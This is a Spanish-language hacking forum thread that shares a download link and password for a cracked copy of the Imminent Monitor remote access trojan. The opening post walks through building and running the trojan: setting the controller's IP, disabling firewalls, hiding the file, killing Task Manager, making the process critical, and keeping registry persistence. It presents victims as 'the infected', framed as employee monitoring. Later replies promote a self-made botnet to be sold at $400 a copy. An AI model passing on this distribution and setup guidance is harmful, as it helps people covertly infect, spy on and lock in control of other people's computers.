WINTXCODERS

Seguridad informática => Malwares => Mensaje iniciado por: Neva(); en Marzo 06, 2017, 09:04:34 PM

Título: IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: Neva(); en Marzo 06, 2017, 09:04:34 PM
Hace tiempo compré IM4, la verdad es que es genial y recomendaría comprarlo, son sólo 25$, único pago.
Esta versión fue publicada por el equipo de RTN, fue crackeada hace no mucho tiempo por lo que el programa es bastante nuevo.
(http://1.bp.blogspot.com/-d3qrxeWBl8Y/VqUQD0UwbYI/AAAAAAAAItU/R_Ze0InYQUk/s1600/Sem%2Bt%25C3%25ADtulo.png)
Si los queréis descargar, id a esta página: http://www.filedropper.com/imminentmonitor4100crackedbyyq8
Contrase;a: xpaulo
VirusTotal: https://virustotal.com/es/file/bee88762f8dae52a6525148f541aada5a219f62d99e5983a9174c0b566955492/analysis/1488829717/ (.rar)
https://virustotal.com/es/file/491f3f7c26ce56b64346075ad0cb01855f7712a437dc2859a7522715231fd834/analysis/1488829751/ server
Es muy detectado, no obstante le he echado un ojo y a primera vista parece estar limpio, el programa funciona correctamente.
No obstante aconsejo abrirlo siempre en una máquina virtual o sandbox.

Instalación:
Abre el archvio dentro de la carpeta Builder, deberás ver un programa que es así.
(https://i.gyazo.com/dfa9f91ca4185793eb167c15e024fb1d.png)
Cambia el mutex para obtener una clave nueva aleatoria, Mutex lo que hace es que tu archivo no tenga más de una instancia abierta.
Client group es el nombre del grupo al que pertenece el infectado, digamos que tienes dos plantas de trabajo donde monitorizas a tus empleados, les podrás llamar planta-1 y planta-2 para una mayor organización.
Ip/dns es tu dominio o ip, asegúrate de tener los puertos abiertos y los firewalls desactivados!
Pasemos a la siguiente ventana.
(https://i.gyazo.com/b0542c678f142aef5c92106a5c8d80bf.png)
Esta ventana hace referencia al inicio del ejecutable con windows, si seleccionas el checkbox, el programa se ejecutará siempre que se inicie el ordenador.
Respecto al startup name y todo eso, da igual el valor que le pongas, a tu gusto.
Finalmente:
(https://i.gyazo.com/fe16871def278f5fc141e9518d0dea0f.png)
Esta configuración te ayudará a prevenir que tu archivo sea borrado, es una pena que la versión crackeada no tenga system wide injection..  :(
Bien , melt file significa que el archivo se borrará y se irá a otra carpeta después de ser abierto.
Disable taskmanager cerrará el administrador de tareas si éste es abierto.
Hide file esconde el archivo
process kernel secutity hará que el proceso sea crítico por lo que si es cerrado, el ordenador deja de responder.
Registry persistence es un bucle que mira que nuestro programa no ha sido desactivado en el registro para la próxima vez que sea ejecutado.
Bien, ya tenemos nuestro cliente hecho! pasemos al servidor.
El apartado general yo lo dejaría así..
(https://i.gyazo.com/07f30eb95d770d9b3ef51687911706cb.png)

Acto seguido ve a la tabla de ports y a;ade el puerto que has seleccionado antes cuando has creado el cliente. (click derecho!)
(https://i.gyazo.com/6748732304f798e3b1affcca20cc5d83.gif)
Y eso es todo, una vez has hecho esto  tu RAT está funcionando y esperando a conexiones
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: BASUH en Marzo 13, 2017, 12:54:08 PM
Mola, muchas gracias por el aporte  ;)
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: Neva(); en Marzo 13, 2017, 04:19:46 PM
You are not allowed to view links. Register or Login
Mola, muchas gracias por el aporte  ;)
nada  ::)
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: #i[J]0SEE en Marzo 14, 2017, 12:03:22 AM
Sabes en que idioma lo han programado?
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: Neva(); en Marzo 14, 2017, 03:48:46 PM
You are not allowed to view links. Register or Login
Sabes en que idioma lo han programado?
.net
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: ForoLand en Marzo 14, 2017, 04:04:04 PM
Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: Neva(); en Marzo 14, 2017, 05:48:02 PM
You are not allowed to view links. Register or Login
Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
Yo tengo una programa por mí pero que no he sacado al público
https://forum.wintxcoders.com/index.php?topic=529.msg2203#msg2203
Lo único es que quité la UI y se basa totalmente en comandos, no obstante también es compatible con un panel webserver.
La verdad es que estoy bastante orgulloso del resultado final  ;)
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: ForoLand en Marzo 15, 2017, 01:22:34 AM
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
Yo tengo una programa por mí pero que no he sacado al público
https://forum.wintxcoders.com/index.php?topic=529.msg2203#msg2203
Lo único es que quité la UI y se basa totalmente en comandos, no obstante también es compatible con un panel webserver.
La verdad es que estoy bastante orgulloso del resultado final  ;)

Crees posible que pronto, lleguemos a tenerla por aqui por wintxcoders ;)
Título: Re:IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.
Publicado por: Neva(); en Marzo 15, 2017, 04:53:32 PM
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
Yo tengo una programa por mí pero que no he sacado al público
https://forum.wintxcoders.com/index.php?topic=529.msg2203#msg2203
Lo único es que quité la UI y se basa totalmente en comandos, no obstante también es compatible con un panel webserver.
La verdad es que estoy bastante orgulloso del resultado final  ;)

Crees posible que pronto, lleguemos a tenerla por aqui por wintxcoders ;)
Lo dudo, si eso lo finalizaré en verano y no creo que nadie lo compre en este foro, el precio de cada bin costará unos 400$